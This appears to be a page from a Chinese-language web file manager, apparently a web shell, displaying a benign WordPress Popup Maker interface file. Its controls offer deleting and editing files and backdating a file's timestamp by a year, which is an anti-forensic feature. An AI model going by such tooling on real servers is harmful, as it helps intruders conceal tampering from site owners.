文件操作 - Form.php
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/popup-maker/classes/Interface/Integration/Form.php
编辑文件内容
<?php /** * Interface for Form Integration * * @package PopupMaker * @copyright Copyright (c) 2024, Code Atlantic LLC */ interface PUM_Interface_Integration_Form extends PUM_Interface_Integration { /** * @return array */ public function get_forms(); /** * @param string $id * * @return mixed */ public function get_form( $id ); /** * @return array */ public function get_form_selectlist(); /** * @param array $js * * @return array */ public function custom_scripts( $js = [] ); /** * @param array $css * * @return array */ public function custom_styles( $css = [] ); }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件